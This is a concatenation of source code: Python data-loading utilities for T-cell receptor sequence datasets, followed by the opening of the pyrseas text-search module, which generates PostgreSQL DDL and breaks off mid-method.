def dedup_lcmv_table_trb_only(
lcmv_tab: pd.DataFrame,
blacklist_label_combos: Sequence[str] = (
"TetMid,TetNeg",
"TetNeg,TetPos",
"TetMid,TetNeg,TetPos",
),
) -> Tuple[List[str], List[str]]:
"""
Return a list of unique TRBs and corresponding set of labels
"""
trb_dedup, labels_dedup = dedup_and_merge_labels(
list(lcmv_tab["TRB"]), list(lcmv_tab["tetramer"])
)
assert utils.is_all_unique(trb_dedup)
all_label_counter = collections.Counter(labels_dedup)
logging.info(f"Combined labels {all_label_counter.most_common()}")
logging.info(f"Filtering out labels {blacklist_label_combos}")
good_label_idx = [
i for i, l in enumerate(labels_dedup) if l not in blacklist_label_combos
]
logging.info(f"Retaining {len(good_label_idx)} sequences with unambiguous labels")
trb_good = [trb_dedup[i] for i in good_label_idx]
labels_good = [labels_dedup[i] for i in good_label_idx]
assert len(trb_good) == len(labels_good) == len(good_label_idx)
label_counter = collections.Counter(labels_good)
logging.info(f"LCMV TRB only deduped labels: {label_counter.most_common()}")
return trb_good, labels_good
def load_vdjdb(
fname: str = os.path.join(LOCAL_DATA_DIR, "vdjdb-2021-02-02", "vdjdb.slim.txt"),
species_filter: Optional[Iterable[str]] = ["MusMusculus", "HomoSapiens"],
tra_trb_filter: Optional[Iterable[str]] = ["TRA", "TRB"],
addtl_filters: Optional[Dict[str, Iterable[str]]] = None,
drop_null: bool = True,
vocab_check: bool = True,
) -> pd.DataFrame:
"""
Load VDJdb as a dataframe. 'cdr3' column is the column containing sequences
~62k examples, spanning 352 distinct antigens
Additional filters can be provided in the format
{column_name: ['acceptableValue1', 'acceptableValue2', ...]}
"""
df = pd.read_csv(fname, sep="\t")
if species_filter is not None:
logging.info(f"Filtering VDJdb species to: {species_filter}")
keep_idx = [i for i in df.index if df.loc[i, "species"] in species_filter]
df = df.loc[keep_idx]
logging.info(f"Species distribution: {collections.Counter(df['species'])}")
if drop_null:
keep_idx = [~pd.isnull(aa) for aa in df["cdr3"]]
logging.info(
f"VDJdb: dropping {np.sum(keep_idx==False)} entries for null cdr3 sequence"
)
df = df.iloc[np.where(keep_idx)]
if vocab_check:
pass_idx = np.array([ft.adheres_to_vocab(aa) for aa in df["cdr3"]])
logging.info(
f"VDJdb: dropping {np.sum(pass_idx==False)} entries for unrecognized AAs"
)
df = df.iloc[np.where(pass_idx)]
nonnull_antigens_df = df.loc[~pd.isnull(df["antigen.epitope"])]
logging.info(
f"Entries with antigen sequence: {nonnull_antigens_df.shape[0]}/{df.shape[0]}"
)
logging.info(
f"Unique antigen sequences: {len(set(nonnull_antigens_df['antigen.epitope']))}"
)
if tra_trb_filter is not None:
logging.info(f"Filtering TRA/TRB to: {tra_trb_filter}")
keep_idx = [i for i in df.index if df.loc[i, "gene"] in tra_trb_filter]
df = df.loc[keep_idx]
# For each of the additional fitlers
if addtl_filters is not None:
for colname, keep_vals in addtl_filters.items():
logging.info(f"Filtering {colname} to {keep_vals}")
keep_idx = [i for i in df.index if df.loc[i, colname] in keep_vals]
df = df.loc[keep_idx]
ab_counter = collections.Counter(df["gene"])
logging.info(f"TRA: {ab_counter['TRA']} | TRB: {ab_counter['TRB']}")
return df
def load_pird(
fname: str = os.path.join(LOCAL_DATA_DIR, "pird", "pird_tcr_ab.csv"),
tra_trb_only: bool = True,
vocab_check: bool = True,
addtl_filters: Optional[Dict[str, Iterable[str]]] = None,
with_antigen_only: bool = False,
) -> pd.DataFrame:
"""
Load PIRD (pan immune repertoire database) TCR A/B data
https://db.cngb.org/pird/tbadb/
For TRA we want the column CDR3.alpha.aa
For TRB we want the column CDR3.beta.aa
The PIRD dataset also has ~8k examples with antigens (73 unique)
"""
if not tra_trb_only:
raise NotImplementedError
df = pd.read_csv(fname, na_values="-", low_memory=False)
# df_orig = pd.read_csv(fname, na_values="-", low_memory=False)
# df = df_orig.dropna(axis=0, how="all", subset=["CDR3.alpha.aa", "CDR3.beta.aa"])
# logging.info(
# f"Dropped {len(df_orig) - len(df)} entires with null sequence in both TRA/TRB"
# )
antigen_null_rate = np.sum(pd.isnull(df["Antigen.sequence"])) / df.shape[0]
logging.info(
f"PIRD data {1.0 - antigen_null_rate:.4f} data labelled with antigen sequence"
)
# Filter out entries that have weird characters in their aa sequences
if vocab_check:
tra_pass = [
pd.isnull(aa) or ft.adheres_to_vocab(aa) for aa in df["CDR3.alpha.aa"]
]
trb_pass = [
pd.isnull(aa) or ft.adheres_to_vocab(aa) for aa in df["CDR3.beta.aa"]
]
both_pass = np.logical_and(tra_pass, trb_pass)
logging.info(
f"PIRD: Removing {np.sum(both_pass == False)} entires with non amino acid residues"
)
df = df.iloc[np.where(both_pass)]
# Collect instances where we have antigen information
nonnull_antigens_df = df.loc[~pd.isnull(df["Antigen.sequence"])]
nonnull_antigens = nonnull_antigens_df["Antigen.sequence"]
logging.info(
f"Entries with antigen sequence: {len(nonnull_antigens)}/{df.shape[0]}"
)
logging.info(f"Unique antigen sequences: {len(set(nonnull_antigens))}")
logging.info(f"PIRD data TRA/TRB instances: {collections.Counter(df['Locus'])}")
retval = nonnull_antigens_df if with_antigen_only else df
# Perform additional filtering
if addtl_filters is not None:
for colname, keep_vals in addtl_filters.items():
logging.info(f"Filtering {colname} to {keep_vals}")
keep_idx = [i for i in retval.index if retval.loc[i, colname] in keep_vals]
retval = retval.loc[keep_idx]
# Report metrics
# print(df.loc[:, ["CDR3.alpha.aa", "CDR3.beta.aa"]])
has_tra = ~pd.isnull(df["CDR3.alpha.aa"])
has_trb = ~pd.isnull(df["CDR3.beta.aa"])
has_both = np.logical_and(has_tra, has_trb)
logging.info(f"PIRD entries with TRB sequence: {np.sum(has_tra)}")
logging.info(f"PIRD entries with TRB sequence: {np.sum(has_trb)}")
logging.info(f"PIRD entries with TRA and TRB: {np.sum(has_both)}")
# print(retval.iloc[np.where(has_both)[0]].loc[:, ["CDR3.alpha.aa", "CDR3.beta.aa"]])
return retval
def _tcrdb_df_to_entries(fname: str) -> List[tuple]:
"""Helper function for processing TCRdb tables"""
def tra_trb_from_str(s: str) -> str:
if s.startswith("TRA"):
return "TRA"
elif s.startswith("TRB"):
return "TRB"
return "UNK"
def infer_row_tra_trb(row) -> str:
"""Takes in a row from itertuples and return inferred TRA/TRB"""
infers = []
if "Vregion" in row._fields:
infers.append(tra_trb_from_str(row.Vregion))
if "Dregion" in row._fields:
infers.append(tra_trb_from_str(row.Dregion))
if "Jregion" in row._fields:
infers.append(tra_trb_from_str(row.Jregion))
if len(infers) == 0:
return "UNK"
# Use majority voting
cnt = collections.Counter(infers)
consensus, consensus_prop = cnt.most_common(1).pop()
if consensus_prop / len(infers) > 0.5:
return consensus
return "UNK" # No majority
acc = os.path.basename(fname).split(".")[0]
df = pd.read_csv(fname, delimiter="\t")
entries = [
(acc, row.RunId, row.AASeq, row.cloneFraction, infer_row_tra_trb(row))
for row in df.itertuples(index=False)
]
return entries
@functools.lru_cache()
def load_tcrdb(
dirname: str = os.path.join(LOCAL_DATA_DIR, "tcrdb"),
drop_unk: bool = True,
vocab_check: bool = True,
) -> pd.DataFrame:
"""
Load TCRdb
https://academic.oup.com/nar/article/49/D1/D468/5912818
http://bioinfo.life.hust.edu.cn/TCRdb/#/
"""
accessions_list_fname = os.path.join(dirname, "tcrdb_accessions_21_03_22.txt")
with open(accessions_list_fname, "r") as source:
accessions = [line.strip() for line in source if not line.startswith("#")]
# Load in each accession
accession_fnames = [os.path.join(dirname, f"{acc}.tsv.gz") for acc in accessions]
pool = multiprocessing.Pool(8)
entries = pool.map(_tcrdb_df_to_entries, accession_fnames)
pool.close()
pool.join()
retval = pd.DataFrame(
itertools.chain.from_iterable(entries),
columns=["accession", "RunId", "AASeq", "cloneFraction", "tra_trb"],
)
if drop_unk:
drop_idx = np.where(retval["tra_trb"] == "UNK")[0]
logging.info(
f"Dropping {len(drop_idx)} TCRdb entries for unknown TRA TRB status"
)
retval.drop(index=drop_idx, inplace=True)
if vocab_check:
is_valid_aa = np.array([ft.adheres_to_vocab(aa) for aa in retval["AASeq"]])
logging.info(
f"TCRdb: Removing {np.sum(is_valid_aa == False)} entries with non-amino acid residues"
)
retval = retval.iloc[np.where(is_valid_aa)]
return retval
def collect_tra_trb(s: str) -> Dict[str, List[str]]:
"""
Given semicolon separated TRA/TRB listings in a string, separate them and return a mapping
If either TRA/TRB is missing, corresponding return will be a list with a single empty string
>>> collect_tra_trb("TRA:foo;TRA:baz;TRB:bar")
{'TRA': ['foo', 'baz'], 'TRB': ['bar']}
>>> collect_tra_trb("TRB:bar")
{'TRA': [''], 'TRB': ['bar']}
>>> collect_tra_trb("TRB:bar;TRA:foo")
{'TRA': ['foo'], 'TRB': ['bar']}
"""
retval = {"TRA": [], "TRB": []}
for part in s.split(";"):
k, v = part.split(":")
retval[k].append(v)
# Return empty strings if TRA/TRB are not found
if not retval["TRA"]:
retval["TRA"].append("")
if not retval["TRB"]:
retval["TRB"].append("")
return retval
def dedup_and_merge_labels(
sequences: Sequence[str], labels: Sequence[str], sep: str = ","
) -> Tuple[List[str], List[str]]:
"""
Remove duplicates in sequences and merge labels accordingly
sep is the label separator, used to split and rejoin labels
Return is sorted!
>>> dedup_and_merge_labels(['a', 'b', 'a'], ['x', 'y', 'y'])
(['a', 'b'], ['x,y', 'y'])
>>> dedup_and_merge_labels(['a', 'b', 'a', 'a'], ['x', 'y', 'y,x', 'z'])
(['a', 'b'], ['x,y,z', 'y'])
>>> dedup_and_merge_labels(['a', 'b', 'd', 'c'], ['x', 'z', 'y', 'n'])
(['a', 'b', 'c', 'd'], ['x', 'z', 'n', 'y'])
"""
# unique returns the *sorted* unique elements of an array
uniq_sequences, inverse_idx, uniq_seq_counts = np.unique(
sequences, return_inverse=True, return_counts=True
)
uniq_labels, agg_count = [], 0
# Walk through all unique sequences and fetch/merge corresponding labels
for i, (seq, c) in enumerate(zip(uniq_sequences, uniq_seq_counts)):
orig_idx = np.where(inverse_idx == i)[0]
match_labels = utils.dedup([labels[i] for i in orig_idx])
if len(match_labels) == 1:
uniq_labels.append(match_labels.pop())
else: # Aggregate labels
aggregated_labels = utils.dedup(
list(
itertools.chain.from_iterable([l.split(sep) for l in match_labels])
)
)
logging.debug(f"Merging {match_labels} -> {sep.join(aggregated_labels)}")
agg_count += 1
uniq_labels.append(sep.join(sorted(aggregated_labels)))
assert len(uniq_sequences) == len(uniq_labels)
logging.info(
f"Deduped from {len(sequences)} -> {len(uniq_sequences)} merging {agg_count} labels"
)
return list(uniq_sequences), uniq_labels
def load_clonotypes_csv_general(fname: str, single_return: bool = True) -> pd.DataFrame:
"""
Load clonotypes.csv file. This file is expected to be a comma-delimited table with columns
"clonotype_id" and "cdr3s_aa".
Returned data frame is the df contained in fname with added columns TRA_aa and TRB_aa
containing amino acid sequences for TRA/TRB, respectively.
single_return = True is default/legacy behavior, where in the event that multiple TRA/TRB
sequences are listed, we take the last listed one from each. Setting this to false returns
a ;-delimited series of TCRs when multiple values are encountered.
"""
# Read file
df = pd.read_csv(fname, index_col=0)
# Expand out the TRA/TRBs
tra_seqs, trb_seqs = [], []
for i, row in df.iterrows():
tra_trb_mapping = collect_tra_trb(row["cdr3s_aa"])
if single_return:
tra_seqs.append(tra_trb_mapping["TRA"][-1])
trb_seqs.append(tra_trb_mapping["TRB"][-1])
else:
tra_seqs.append(";".join(tra_trb_mapping["TRA"]))
trb_seqs.append(";".join(tra_trb_mapping["TRB"]))
df["TRA_aa"] = tra_seqs
df["TRB_aa"] = trb_seqs
return df
def load_10x(
celltype: str = "CD8_healthy", exclude_singles: bool = True
) -> pd.DataFrame:
"""
Load 10x data. Columns of interest are TRA_aa and TRB_aa
"""
def split_to_tra_trb(s: Iterable[str]):
"""Split into two lists of TRA and TRB"""
# TODO this does NOT correctly handle cases where there are say
# multiple TRA sequences in a single row
tra_seqs, trb_seqs = [], []
for entry in s:
sdict = dict([part.split(":") for part in entry.split(";")])
tra = sdict["TRA"] if "TRA" in sdict else ""
trb = sdict["TRB"] if "TRB" in sdict else ""
tra_seqs.append(tra)
trb_seqs.append(trb)
return tra_seqs, trb_seqs
dirname = os.path.join(LOCAL_DATA_DIR, "10x", celltype)
assert os.path.isdir(dirname), f"Unrecognized celltype: {celltype}"
if celltype == "CD8_healthy":
fnames = glob.glob(
os.path.join(dirname, "vdj_v1_hs_aggregated_donor*_clonotypes.csv")
)
else:
fnames = glob.glob(os.path.join(dirname, "*_t_clonotypes.csv"))
assert fnames
fnames = sorted(fnames)
dfs = []
for fname in fnames:
df = pd.read_csv(fname)
tra_seqs, trb_seqs = split_to_tra_trb(df["cdr3s_aa"])
df["TRA_aa"] = tra_seqs
df["TRB_aa"] = trb_seqs
tra_nt, trb_nt = split_to_tra_trb(df["cdr3s_nt"])
df["TRA_nt"] = tra_nt
df["TRB_nt"] = trb_nt
if exclude_singles:
is_single_idx = np.where(
np.logical_or(df["TRA_aa"] == "", df["TRB_aa"] == "")
)
logging.info(
f"Dropping {len(is_single_idx[0])} entries for unmatched TRA/TRB"
)
df.drop(index=is_single_idx[0], inplace=True)
dfs.append(df)
retval = pd.concat(dfs, axis=0)
return retval
def load_glanville() -> pd.DataFrame:
"""Load in the Glanville GLIPH dataset"""
fname = os.path.join(LOCAL_DATA_DIR, "glanville", "glanville_curated.csv")
df = pd.read_csv(fname, low_memory=False, header="infer")
df["CDR3b_spaced"] = [ft.insert_whitespace(aa) for aa in df["CDR3b"]]
return df
def load_bcc(
dirname: str = os.path.join(LOCAL_DATA_DIR, "GSE123813_bcc"),
require_tra: bool = False,
require_trb: bool = False,
) -> pd.DataFrame:
"""
Load the BCC TCR data
Source: https://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE123813
"""
# Load in the tables
tcr_table = pd.read_csv(
os.path.join(dirname, "GSE123813_bcc_tcr.txt"), sep="\t", index_col=0,
)
tcr_table.index.name = "cell.id"
metadata_table = pd.read_csv(
os.path.join(dirname, "GSE123813_bcc_tcell_metadata.txt"),
sep="\t",
index_col=0,
)
# Intersect and concatenate
overlapped_idx = [i for i in metadata_table.index if i in tcr_table.index]
table = metadata_table.loc[overlapped_idx]
tcr_table = tcr_table.loc[overlapped_idx]
for col in tcr_table.columns:
table[col] = tcr_table[col]
# Create dedicated columns for TRA and TRB
tra_trb_pairs = []
for item in table["cdr3s_aa"]:
d = {"TRA": "", "TRB": ""} # Null sequences for both
d.update(dict([i.split(":") for i in item.split(";")]))
tra_trb_pairs.append((d["TRA"], d["TRB"]))
tra, trb = zip(*tra_trb_pairs)
table["TRA_aa"] = tra
table["TRB_aa"] = trb
if require_tra:
keep_idx = np.array([i for i, aa in enumerate(table["TRA_aa"]) if aa])
logging.info(
f"BCC: Retaining {len(keep_idx)}/{table.shape[0]} entries with TRA sequence"
)
table = table.iloc[keep_idx]
if require_trb:
keep_idx = np.array([i for i, aa in enumerate(table["TRB_aa"]) if aa])
logging.info(
f"BCC: retaining {len(keep_idx)}/{table.shape[0]} entries with TRB sequence"
)
table = table.iloc[keep_idx]
return table
def load_immuneaccess_mira_covid(
dirname: str = os.path.join(
LOCAL_DATA_DIR, "immuneaccess/ImmuneCODE-MIRA-Release002.1"
),
basename: str = "peptide-detail-ci.csv",
) -> pd.DataFrame:
"""
Load the immuneaccess data
https://clients.adaptivebiotech.com/pub/covid-2020
https://www.researchsquare.com/article/rs-51964/v1
Dataset includes three panels:
minigene_set1, minigene_set2 target large protein sequences
C19_cI targets individual peptides or small groups of peptides
subject-metadata.csv - metadata
orfs.csv - genomic location of MIRA targets as per GenBank11
minigene-hits.csv - counts of number of unique TCRs bound to targets in minigene panels
minigene-detail.csv - describes identity of TCRs bound per target for both minigene panels
peptide-hits.csv - counts of number of unique TCRs bound to targets within C19_cI panel
peptide-detail.csv - describes identity of TCRs bound per target for C19_cI MIRA panel
Formerly used minigene-detail.csv, now use peptide-detail-ci
"""
fname = os.path.join(dirname, basename)
df = pd.read_csv(fname, delimiter=",", low_memory=False)
tcr_seqs = [i.split("+")[0] for i in df["TCR BioIdentity"]]
good_idx = []
for i, seq in enumerate(tcr_seqs):
if ft.adheres_to_vocab(seq):
good_idx.append(i)
else:
logging.debug(f"immuneaccess MIRA: Got anomalous sequence: {seq}")
logging.info(f"Retaining {len(good_idx)}/{len(df)} fully specified TCR sequences")
df = df.iloc[np.array(good_idx)]
df["TCR_aa"] = [i.split("+")[0] for i in df["TCR BioIdentity"]]
# Load in metadata and attach it
metadata_fname = os.path.join(dirname, "subject-metadata.csv")
metadata_df = pd.read_csv(metadata_fname, index_col=0)
df["cohort"] = [metadata_df.loc[e, "Cohort"] for e in df["Experiment"]]
df["celltype"] = [metadata_df.loc[e, "Cell Type"] for e in df["Experiment"]]
df["patient"] = [metadata_df.loc[e, "Subject"] for e in df["Experiment"]]
df["target"] = [metadata_df.loc[e, "Target Type"] for e in df["Experiment"]]
return df
def load_longitudinal_covid_trbs(
dirname: str = os.path.join(LOCAL_DATA_DIR, "covid_longitudinal/beta"),
check_vocab: bool = True,
) -> pd.DataFrame:
"""
Load longitudinal covid data
References:
https://zenodo.org/record/4065547
https://elifesciences.org/articles/63502
"""
filenames = glob.glob(os.path.join(dirname, "*/*_beta.txt.gz"))
dataframes = []
for fname in filenames:
# Parse out metadata from the filename
bname = os.path.basename(fname)
tokens = bname.split(".")[0].split("_")
if len(tokens) != 4:
logging.warn(f"Could not parse metadata from {bname}, skipping")
continue
patient, timepoint, celltype, tcr_segment = tokens
assert tcr_segment == "beta"
if not utils.is_numeric_scalar(timepoint):
timepoint, celltype = celltype, timepoint
timepoint = int(timepoint)
if celltype in ("F1", "F2"):
celltype = "PBMC_rep1" if celltype == "F1" else "PBMC_rep2"
# Read in the TCRs
df = pd.read_csv(fname, sep="\t", index_col=0)
if check_vocab:
passes_vocab = [ft.adheres_to_vocab(aa) for aa in df["aaSeqCDR3"]]
keep_idx = np.where(passes_vocab)
df = df.iloc[keep_idx]
df["celltype"] = celltype
df["timepoint"] = timepoint
df["patient"] = patient
dataframes.append(df)
# https://stackoverflow.com/questions/41181779/merging-2-dataframes-vertically
retval = pd.concat(dataframes, ignore_index=True)
return retval
def _load_reuben_df_with_label_col(
fname: str, label_col: str, drop_na: bool = True, drop_illegal: bool = True
) -> pd.DataFrame:
"""Helper function for loading in parallel"""
assert os.path.isfile(fname)
df = pd.read_csv(fname, sep="\t", low_memory=False)
df["label"] = label_col
if drop_na:
df.drop(index=df.index[pd.isna(df["aminoAcid"])], inplace=True)
if drop_illegal:
illegal_idx = [
df.index[i]
for i, aa in enumerate(df["aminoAcid"])
if not ft.adheres_to_vocab(aa)
]
df.drop(index=illegal_idx, inplace=True)
return df
def load_reuben_nsclc(
dirname: str = os.path.join(LOCAL_DATA_DIR, "reuben_nsclc")
) -> pd.DataFrame:
"""
Load the TRB sequences for NSCLC tumor and normal
"""
assert os.path.isdir(dirname)
metadata_df = pd.read_csv(
os.path.join(dirname, "SampleOverview_06-29-2021_9-05-38_PM.tsv"),
sep="\t",
index_col=0,
)
metadata_tokens = {
i: utils.dedup([tok.strip() for tok in row["sample_tags"].split(",")])
for i, row in metadata_df.iterrows()
}
# Find the names the correspond to normal and tumor and their overlap
norm_fnames = [
k for k, v in metadata_tokens.items() if "Normal adjacent tissue" in v
]
tumor_fnames = [k for k, v in metadata_tokens.items() if "Tumor" in v]
assert not set(norm_fnames).intersection(tumor_fnames)
strip_tail_suffix = lambda x: "-".join(x.split("-")[:-1])
norm_prefixes = {strip_tail_suffix(x): x for x in norm_fnames}
assert len(norm_prefixes) == len(norm_fnames)
tumor_prefixes = {strip_tail_suffix(x): x for x in tumor_fnames}
assert len(tumor_prefixes) == len(tumor_fnames)
# Find overlap
shared_prefixes = sorted(
list(set(norm_prefixes.keys()).intersection(tumor_prefixes.keys()))
)
norm_fnames = [
os.path.join(dirname, norm_prefixes[p] + ".tsv.gz") for p in shared_prefixes
]
tumor_fnames = [
os.path.join(dirname, tumor_prefixes[p] + ".tsv.gz") for p in shared_prefixes
]
assert len(norm_fnames) == len(tumor_fnames)
# Load in the data
pool = multiprocessing.Pool(multiprocessing.cpu_count())
pfunc_norm = functools.partial(
_load_reuben_df_with_label_col, label_col="normal_adj_tissue"
)
pfunc_tumor = functools.partial(_load_reuben_df_with_label_col, label_col="tumor")
normal_dfs = pool.map(pfunc_norm, norm_fnames)
tumor_dfs = pool.map(pfunc_tumor, tumor_fnames)
pool.close()
pool.join()
combo_df = pd.concat(normal_dfs + tumor_dfs)
return combo_df
def load_chiou_nsclc_yeast_screen(
dirname: str = os.path.join(LOCAL_DATA_DIR, "chiou_nsclc_yeast_screen")
) -> pd.DataFrame:
"""
Paper performs:
1) Take patient TCR data, find specificity groups (returned here)
2) Take specificity groups, focus on motif S%DGMNTE
3) Use a yeast screen to identify antigens binding to group
4) Validate that antigen and its cross-reactivity patterns
https://www.ncbi.nlm.nih.gov/pmc/articles/PMC7960510/#mmc1
Paper focuses on motif: S%DGMNTE
"""
# TODO investigate what our model predicts as similar to these sequences
# TODO potentially investigate whether our model's embedding can capture similar groups
assert os.path.isdir(dirname)
spec_groups_df = pd.read_csv(
os.path.join(dirname, "nsclc_share_specificity_groups.txt"), sep="\t"
)
return spec_groups_df
def load_aa_properties(
fname: str = os.path.join(LOCAL_DATA_DIR, "aa_properties.csv")
) -> pd.DataFrame:
"""Load aa properties"""
df = pd.read_csv(fname, index_col=0, header=0)
assert all([x == y for x, y in zip(df.index, ft.AMINO_ACIDS)])
return df
def chunkify(x: Sequence[Any], chunk_size: int = 128):
"""
Split list into chunks of given size
>>> chunkify([1, 2, 3, 4, 5, 6, 7], 3)
[[1, 2, 3], [4, 5, 6], [7]]
>>> chunkify([(1, 10), (2, 20), (3, 30), (4, 40)], 2)
[[(1, 10), (2, 20)], [(3, 30), (4, 40)]]
"""
retval = [x[i : i + chunk_size] for i in range(0, len(x), chunk_size)]
return retval
def chunkify_dict(
x: Dict[str, Sequence[Any]], chunk_size: int = 128
) -> List[Dict[str, Sequence[Any]]]:
"""
Apply chunkify to each item in the dictionary
"""
# Dict of chunkified lists
chunkified = {k: chunkify(v, chunk_size) for k, v in x.items()}
# List of chunkfiied dicts
retval = []
for i in range(len(chunkified[list(chunkified.keys())[0]])):
chunk = {k: chunkified[k][i] for k in x.keys()}
assert len(set([len(v) for v in chunk.values()])) == 1
retval.append(chunk)
return retval
def min_dist_train_test_pairs(
train_pairs: List[Tuple[str, str]], test_pairs: List[Tuple[str, str]]
) -> np.ndarray:
"""
For each training pair, find the minimum edit distance to any test pair
summed across the two elements in the pair
"""
retval = []
test_x, test_y = zip(*test_pairs)
for x, y in train_pairs:
x_dists = np.array([Levenshtein.distance(x, item) for item in test_x])
y_dists = np.array([Levenshtein.distance(y, item) for item in test_y])
d = np.min(x_dists + y_dists)
retval.append(d)
return np.array(retval)
def min_dist_train_test_seqs(
train_seqs: Sequence[str], test_seqs: Collection[str]
) -> np.ndarray:
"""
For each training sequence, finding the minimum edit distance
to any test sequence.
"""
retval = []
for seq in train_seqs:
# Calculate the edit distance to the most similar test sequence
d = min([Levenshtein.distance(seq, test_seq) for test_seq in test_seqs])
retval.append(d)
return np.array(retval)
def sanitize_train_sequences(
train_seqs: Sequence[str],
train_labels: Sequence[str],
test_seqs: Collection[str],
min_edit_dist: int = 2,
) -> Tuple[List[str], List[str]]:
"""
Return the training seqs/labels that are at least a given edit distance from
any test sequence
"""
assert len(train_seqs) == len(train_labels)
train_dist = min_dist_train_test_seqs(train_seqs, test_seqs)
passing_idx = np.where(train_dist >= min_edit_dist)[0]
logging.info(
f"Passing >= {min_edit_dist} edit dist cutoff: {len(passing_idx)}/{len(train_seqs)}"
)
return [train_seqs[i] for i in passing_idx], [train_labels[i] for i in passing_idx]
def write_lcmv_subsampled_benchmark_data():
"""Write the LCMV subsampled data for benchmarking runtime"""
tab = load_lcmv_table()
# Write out the table at varying sizes
tab_condensed = tab["TRB"]
for s in [500, 1000, 1500, 2000, 2500, 5000, 10000]:
# Write GLIPH inputs
t = tab_condensed.iloc[:s]
t.to_csv(
os.path.join(
LOCAL_DATA_DIR, "lcmv_runtime_benchmark_files", f"lcmv_sub_{s}.tsv"
),
sep="\t",
index=False,
)
# Write TCRDist3 inputs
write_lcmv_tcrdist3_input(
fname=os.path.join(
LOCAL_DATA_DIR,
"lcmv_runtime_benchmark_files",
f"tcrdist3_beta_lcmv_sub_{s}.tsv",
),
dual_chain=False,
subset=s,
)
return
def write_lcmv_tcrdist_input(fname: str = "temp.tsv"):
"""
Write the LCMV data in format for TCRDist, which expects a tsv file with the columns:
id epitope subject a_nucseq b_nucseq a_quals b_quals
Output is written to fname
"""
lcmv = load_lcmv_table()
seqs, labels = dedup_lcmv_table(lcmv, return_mode="nt")
tra, trb = zip(*seqs)
df = pd.DataFrame(
{
"id": np.arange(len(seqs)),
"epitope": ["foo"] * len(seqs),
"subject": ["bar"] * len(seqs),
"a_nucseq": tra,
"b_nucseq": trb,
}
)
df.to_csv(fname, sep="\t", index=False)
def write_lcmv_tcrdist3_input(
fname: str = os.path.join(EXTERNAL_EVAL_DIR, "lcmv_test_tcrdist3.tsv"),
dual_chain: bool = True,
subset: Union[str, int] = "test",
) -> pd.DataFrame:
"""
Write the LCMV data in a format for TCRDist, which expects 3 columns per chain
cdr3_b_aa v_b_gene j_b_gene # example for b chain
v/j genes expect the *01 suffix
Important processing:
if a v/j gene has a "+" indicating its two or more genes, we take the last one
"""
def sanitize_vj(s: str) -> str:
if "+" in s:
s = s.split("+")[-1]
if not s.endswith("*01"):
s += "*01"
return s
lcmv = load_lcmv_table()
df, labels = dedup_lcmv_table(lcmv, return_mode="full")
if isinstance(subset, str):
labels_sub = split_arr(labels, "test")
df_sub = split_arr(df, "test") # We only evaluate test set clustering
else:
labels_sub = labels[:subset]
df_sub = df.iloc[:subset]
if dual_chain:
retval = df_sub.loc[
:, ["TRA", "v_a_gene", "j_a_gene", "TRB", "v_b_gene", "j_b_gene"]
]
retval.columns = [
"cdr3_a_aa",
"v_a_gene",
"j_a_gene",
"cdr3_b_aa",
"v_b_gene",
"j_b_gene",
]
else:
# Single chain
retval = df_sub.loc[:, ["TRB", "v_b_gene", "j_b_gene"]]
retval.columns = ["cdr3_b_aa", "v_b_gene", "j_b_gene"]
for colname in ["v_a_gene", "j_a_gene", "v_b_gene", "j_b_gene"]:
if colname in retval.columns:
retval[colname] = [sanitize_vj(s) for s in retval[colname]]
# Attach the "truth" column
retval["gp33_binding"] = ["TetPos" in l or "TetMid" in l for l in labels_sub]
retval.to_csv(fname, sep="\t", index=False)
return retval
def on_the_fly():
"""On the fly testing"""
# table = load_longitudinal_covid_trbs()
# print(table)
# print(collections.Counter(table["patient"]).most_common())
# print(collections.Counter(table["celltype"]).most_common())
# df = load_clonotypes_csv_general(sys.argv[1])
# print(df)
# print(write_lcmv_tcrdist3_input())
write_lcmv_subsampled_benchmark_data()
if __name__ == "__main__":
import doctest
# doctest.testmod()
# main()
on_the_fly()
|
py | b40439b8720eb3a38e6009ffafb4b7be1a8ac1d2 | # -*- coding: utf-8 -*-
"""
pyrseas.dbobject.textsearch
~~~~~~~~~~~~~~~~~~~~~~~~~~~
This defines eight classes: TSConfiguration, TSDictionary,
TSParser and TSTemplate derived from DbSchemaObject, and
TSConfigurationDict, TSDictionaryDict, TSParserDict and
TSTemplateDict derived from DbObjectDict.
"""
from . import DbObjectDict, DbSchemaObject
from . import commentable, ownable, split_schema_obj
class TSConfiguration(DbSchemaObject):
"""A text search configuration definition"""
keylist = ["schema", "name"]
single_extern_file = True
catalog = "pg_ts_config"
def __init__(self, name, schema, description, owner, parser, oid=None):
"""Initialize the configuration
:param name: configuration name (from cfgname)
:param description: comment text (from obj_description())
:param schema: schema name (from cfgnamespace)
:param owner: owner name (from rolname via cfgowner)
:param parser: parser name (from prsname via cfgparser)
"""
super(TSConfiguration, self).__init__(name, schema, description)
self._init_own_privs(owner, [])
self.parser = parser
self.oid = oid
@staticmethod
def query(dbversion=None):
return """
SELECT nc.nspname AS schema, cfgname AS name,
rolname AS owner, np.nspname || '.' || prsname AS parser,
obj_description(c.oid, 'pg_ts_config') AS description, c.oid
FROM pg_ts_config c JOIN pg_roles r ON (r.oid = cfgowner)
JOIN pg_ts_parser p ON (cfgparser = p.oid)
JOIN pg_namespace nc ON (cfgnamespace = nc.oid)
JOIN pg_namespace np ON (prsnamespace = np.oid)
WHERE nc.nspname != 'pg_catalog'
AND nc.nspname != 'information_schema'
ORDER BY nc.nspname, cfgname"""
@staticmethod
def from_map(name, schema, inobj):
"""Initialize a configuration instance from a YAML map
:param name: configuration name
:param name: schema map
:param inobj: YAML map of the configuration
:return: configuration instance
"""
obj = TSConfiguration(
name,
schema.name,
inobj.pop("description", None),
inobj.pop("owner", None),
inobj.pop("parser", None),
)
obj.set_oldname(inobj)
return obj
@property
def objtype(self):
return "TEXT SEARCH CONFIGURATION"
def to_map(self, db, no_owner):
"""Convert a text search configuration to a YAML-suitable format
:return: dictionary
"""
dct = super(TSConfiguration, self).to_map(db, no_owner)
if "." in self.parser:
(sch, pars) = self.parser.split(".")
if sch == self.schema:
dct["parser"] = pars
return dct
@commentable
@ownable
def create(self, dbversion=None):
"""Return SQL statements to CREATE the configuration
:return: SQL statements
"""
clauses = []
clauses.append("PARSER = %s" % self.parser)
return [
"CREATE TEXT SEARCH CONFIGURATION %s (\n %s)"
% (self.qualname(), ",\n ".join(clauses))
]
def get_implied_deps(self, db):
deps = super(TSConfiguration, self).get_implied_deps(db)
deps.add(db.tsparsers[split_schema_obj(self.parser, self.schema)])
return deps
class TSConfigurationDict(DbObjectDict):
"The collection of text search configurations in a database"
cls = TSConfiguration
def from_map(self, schema, inconfigs):
